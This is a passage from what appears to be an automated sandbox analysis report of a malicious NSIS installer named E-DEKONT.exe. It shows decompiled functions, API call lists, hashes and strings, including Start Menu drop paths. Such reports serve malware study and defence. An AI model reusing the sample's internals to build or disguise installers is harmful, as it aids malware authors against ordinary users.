                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede$C:\Users\user\Desktop$C:\Users\user\Desktop\E-DEKONT.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2488574733-3649245278
                                                                            • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                                            • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                            • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                                            • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 158 40505d-405065 152->158 159 404fee-404ff4 152->159 153->150 154->153 161 404f92-404f95 155->161 162 404f1f-404f22 155->162 156->152 156->155 190 404dc9-404dcf 157->190 191 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->191 167 405067-40506d SendMessageW 158->167 168 40506f-405076 158->168 164 405245-405257 call 40427e 159->164 165 404ffa-405004 159->165 161->152 166 404f97-404fa1 161->166 170 404f24-404f2b 162->170 171 404f2d-404f42 call 404bb0 162->171 165->164 173 40500a-405019 SendMessageW 165->173 175 404fb1-404fbb 166->175 176 404fa3-404faf SendMessageW 166->176 167->168 177 405078-40507f 168->177 178 4050aa-4050b1 168->178 170->161 170->171 171->161 200 404f44-404f55 171->200 173->164 184 40501f-405030 SendMessageW 173->184 175->152 186 404fbd-404fc7 175->186 176->175 187 405081-405082 ImageList_Destroy 177->187 188 405088-40508f 177->188 182 405207-40520e 178->182 183 4050b7-4050c3 call 4011ef 178->183 182->164 195 405210-405217 182->195 211 4050d3-4050d6 183->211 212 4050c5-4050c8 183->212 193 405032-405038 184->193 194 40503a-40503c 184->194 196 404fd8-404fe2 186->196 197 404fc9-404fd6 186->197 187->188 198 405091-405092 GlobalFree 188->198 199 405098-4050a4 188->199 202 404dd2-404dd9 190->202 206 404ea7-404eab 191->206 193->194 204 40503d-405056 call 401299 SendMessageW 193->204 194->204 195->164 205 405219-405243 ShowWindow GetDlgItem ShowWindow 195->205 196->152 197->152 198->199 199->178 200->161 201 404f57-404f59 200->201 207 404f5b-404f62 201->207 208 404f6c 201->208 209 404e6f-404e82 202->209 210 404ddf-404e07 202->210 204->158 205->164 214 404ec5-404ecd call 40424c 206->214 215 404ead-404ec0 ShowWindow call 40424c 206->215 217 404f64-404f66 207->217 218 404f68-404f6a 207->218 221 404f6f-404f8b call 40117d 208->221 209->202 225 404e88-404e8c 209->225 219 404e41-404e43 210->219 220 404e09-404e3f SendMessageW 210->220 226 405117-40513b call 4011ef 211->226 227 4050d8-4050f1 call 4012e2 call 401299 211->227 222 4050ca 212->222 223 4050cb-4050ce call 404c30 212->223 214->141 215->164 217->221 218->221 231 404e45-404e54 SendMessageW 219->231 232 404e56-404e6c SendMessageW 219->232 220->209 221->161 222->223 223->211 225->191 225->206 240 405141 226->240 241 4051dd-4051f1 InvalidateRect 226->241 249 405101-405110 SendMessageW 227->249 250 4050f3-4050f9 227->250 231->209 232->209 244 405144-40514f 240->244 241->182 243 4051f3-405202 call 404b83 call 404b6b 241->243 243->182 246 405151-405160 244->246 247 4051c5-4051d7 244->247 254 405162-40516f 246->254 255 405173-405176 246->255 247->241 247->244 249->226 251 4050fb 250->251 252 4050fc-4050ff 250->252 251->252 252->249 252->250 254->255 256 405178-40517b 255->256 257 40517d-405186 255->257 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->247 260->259
                                                                            C-Code - Quality: 96%
                                                                            			E00404C62(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x434f28;
				_t282 = 0;
				_v24 =  *0x434ef4 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x434efd & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404BB0(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x434efc) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42d22c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42d240;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42d22c = _t282;
								 *0x42d240 = _t282;
								 *0x434f60 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x434efd & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C30();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42d240;
									_t195 =  *0x434f28;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x434f2c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t282) {
											E00404B6B(0x3ff, 0xfffffffb, E00404B83(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x434f2c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42d240);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x434f60 = _t306;
					 *0x42d240 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t252 = LoadBitmapW( *0x434ee0, 0x6e);
					 *0x42d234 =  *0x42d234 | 0xffffffff;
					_t313 = _t252;
					 *0x42d23c = SetWindowLongW(_v8, 0xfffffffc, E0040525A);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d22c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d22c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A4(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00404217(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00404217(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x42d240 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x42d240 + _t316 * 4) = _t276;
									_t284 =  *( *0x42d240 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x434f2c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040424C(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040424C(_v12);
								L91:
								return E0040427E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}





























































                                                                            0x00404c71
                                                                            0x00404c82
                                                                            0x00404c87
                                                                            0x00404c8f
                                                                            0x00404c95
                                                                            0x00404c9d
                                                                            0x00404cab
                                                                            0x00404cae
                                                                            0x00404ecf
                                                                            0x00404ed6
                                                                            0x00404eea
                                                                            0x00404ed8
                                                                            0x00404eda
                                                                            0x00404edd
                                                                            0x00404ede
                                                                            0x00404ee5
                                                                            0x00404ee5
                                                                            0x00404ef6
                                                                            0x00404f04
                                                                            0x00404f07
                                                                            0x00404f1d
                                                                            0x00404f92
                                                                            0x00404f95
                                                                            0x00404f97
                                                                            0x00404fa1
                                                                            0x00404faf
                                                                            0x00404faf
                                                                            0x00404fb1
                                                                            0x00404fbb
                                                                            0x00404fc1
                                                                            0x00404fc4
                                                                            0x00404fc7
                                                                            0x00404fe2
                                                                            0x00404fc9
                                                                            0x00404fd3
                                                                            0x00404fd3
                                                                            0x00404fc7
                                                                            0x00404fbb
                                                                            0x00000000
                                                                            0x00404f95
                                                                            0x00404f22
                                                                            0x00404f2d
                                                                            0x00404f32
                                                                            0x00404f39
                                                                            0x00404f3e
                                                                            0x00404f42
                                                                            0x00404f4d
                                                                            0x00404f4d
                                                                            0x00404f51
                                                                            0x00404f55
                                                                            0x00404f59
                                                                            0x00404f6c
                                                                            0x00404f5b
                                                                            0x00404f5b
                                                                            0x00404f62
                                                                            0x00404f68
                                                                            0x00404f64
                                                                            0x00404f64
                                                                            0x00404f64
                                                                            0x00404f62
                                                                            0x00404f70
                                                                            0x00404f72
                                                                            0x00404f85
                                                                            0x00404f88
                                                                            0x00404f8b
                                                                            0x00404f8b
                                                                            0x00404f55
                                                                            0x00000000
                                                                            0x00404f42
                                                                            0x00404f24
                                                                            0x00404f2b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404fe5
                                                                            0x00404fe5
                                                                            0x00404fec
                                                                            0x0040505d
                                                                            0x00405065
                                                                            0x0040506d
                                                                            0x0040506d
                                                                            0x00405076
                                                                            0x00405078
                                                                            0x0040507f
                                                                            0x00405082
                                                                            0x00405082
                                                                            0x00405088
                                                                            0x0040508f
                                                                            0x00405092
                                                                            0x00405092
                                                                            0x00405098
                                                                            0x0040509e
                                                                            0x004050a4
                                                                            0x004050a4
                                                                            0x004050b1
                                                                            0x00405207
                                                                            0x0040520e
                                                                            0x0040522b
                                                                            0x00405231
                                                                            0x00405243
                                                                            0x00405243
                                                                            0x00000000
                                                                            0x004050b7
                                                                            0x004050b9
                                                                            0x004050be
                                                                            0x004050c3
                                                                            0x004050c8
                                                                            0x004050ca
                                                                            0x004050ca
                                                                            0x004050cb
                                                                            0x004050cc
                                                                            0x004050ce
                                                                            0x004050ce
                                                                            0x004050d6
                                                                            0x00405117
                                                                            0x00405119
                                                                            0x00405129
                                                                            0x0040512c
                                                                            0x00405131
                                                                            0x00405138
                                                                            0x0040513b
                                                                            0x004051dd
                                                                            0x004051e3
                                                                            0x004051f1
                                                                            0x00405202
                                                                            0x00405202
                                                                            0x00000000
                                                                            0x004051f1
                                                                            0x00405141
                                                                            0x00405144
                                                                            0x0040514a
                                                                            0x0040514f
                                                                            0x00405151
                                                                            0x00405153
                                                                            0x00405159
                                                                            0x00405160
                                                                            0x00405165
                                                                            0x0040516c
                                                                            0x0040516f
                                                                            0x0040516f
                                                                            0x00405176
                                                                            0x00405182
                                                                            0x00405186
                                                                            0x00405188
                                                                            0x00405188
                                                                            0x00405178
                                                                            0x0040517a
                                                                            0x0040517a
                                                                            0x004051a8
                                                                            0x004051b4
                                                                            0x004051c3
                                                                            0x004051c3
                                                                            0x004051c5
                                                                            0x004051c8
                                                                            0x004051d1
                                                                            0x00000000
                                                                            0x004050d8
                                                                            0x004050e3
                                                                            0x004050e6
                                                                            0x004050eb
                                                                            0x004050ed
                                                                            0x004050f1
                                                                            0x00405101
                                                                            0x0040510b
                                                                            0x0040510d
                                                                            0x00405110
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004050f3
                                                                            0x004050f3
                                                                            0x004050f9
                                                                            0x004050fb
                                                                            0x004050fb
                                                                            0x004050fc
                                                                            0x004050fd
                                                                            0x00000000
                                                                            0x004050f3
                                                                            0x004050d6
                                                                            0x004050b1
                                                                            0x00404ff4
                                                                            0x00000000
                                                                            0x0040500a
                                                                            0x00405014
                                                                            0x00405019
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040502b
                                                                            0x00405030
                                                                            0x0040503c
                                                                            0x0040503c
                                                                            0x0040503e
                                                                            0x0040504d
                                                                            0x0040504f
                                                                            0x00405053
                                                                            0x00405056
                                                                            0x00000000
                                                                            0x00405056
                                                                            0x00404ff4
                                                                            0x00404cb4
                                                                            0x00404cb9
                                                                            0x00404cc2
                                                                            0x00404cc9
                                                                            0x00404cd7
                                                                            0x00404ce2
                                                                            0x00404ce8
                                                                            0x00404cf6
                                                                            0x00404d0a
                                                                            0x00404d0f
                                                                            0x00404d1c
                                                                            0x00404d21
                                                                            0x00404d37
                                                                            0x00404d48
                                                                            0x00404d55
                                                                            0x00404d55
                                                                            0x00404d58
                                                                            0x00404d5e
                                                                            0x00404d60
                                                                            0x00404d63
                                                                            0x00404d68
                                                                            0x00404d6d
                                                                            0x00404d6f
                                                                            0x00404d6f
                                                                            0x00404d8f
                                                                            0x00404d8f
                                                                            0x00404d91
                                                                            0x00404d92
                                                                            0x00404d97
                                                                            0x00404d9a
                                                                            0x00404d9d
                                                                            0x00404da1
                                                                            0x00404da6
                                                                            0x00404dab
                                                                            0x00404daf
                                                                            0x00404db4
                                                                            0x00404db9
                                                                            0x00404dbb
                                                                            0x00404dc3
                                                                            0x00404e8e
                                                                            0x00404ea1
                                                                            0x00000000
                                                                            0x00404dc9
                                                                            0x00404dcc
                                                                            0x00404dcf
                                                                            0x00404dd2
                                                                            0x00404dd2
                                                                            0x00404dd9
                                                                            0x00404ddf
                                                                            0x00404de2
                                                                            0x00404de8
                                                                            0x00404de9
                                                                            0x00404dee
                                                                            0x00404df7
                                                                            0x00404dfe
                                                                            0x00404e01
                                                                            0x00404e04
                                                                            0x00404e07
                                                                            0x00404e43
                                                                            0x00404e64
                                                                            0x00404e6c
                                                                            0x00404e45
                                                                            0x00404e52
                                                                            0x00404e52
                                                                            0x00404e09
                                                                            0x00404e0c
                                                                            0x00404e1b
                                                                            0x00404e25
                                                                            0x00404e2d
                                                                            0x00404e34
                                                                            0x00404e3c
                                                                            0x00404e3c
                                                                            0x00404e07
                                                                            0x00404e72
                                                                            0x00404e73
                                                                            0x00404e7f
                                                                            0x00404e7f
                                                                            0x00404e8c
                                                                            0x00404ea7
                                                                            0x00404eab
                                                                            0x00404ec8
                                                                            0x00404ecd
                                                                            0x00000000
                                                                            0x00404ead
                                                                            0x00404eb2
                                                                            0x00404ebb
                                                                            0x00405245
                                                                            0x00405257
                                                                            0x00405257
                                                                            0x00404eab
                                                                            0x00000000
                                                                            0x00404e8c
                                                                            0x00404dc3

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                                            • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                                            • DeleteObject.GDI32(00000000), ref: 00404D58
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                                            • GlobalFree.KERNEL32(?), ref: 00405092
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                                            • ShowWindow.USER32(?,00000000), ref: 00405231
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                                            • ShowWindow.USER32(00000000), ref: 00405243
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                            • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                                            • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                            • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 95%
                                                                            			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
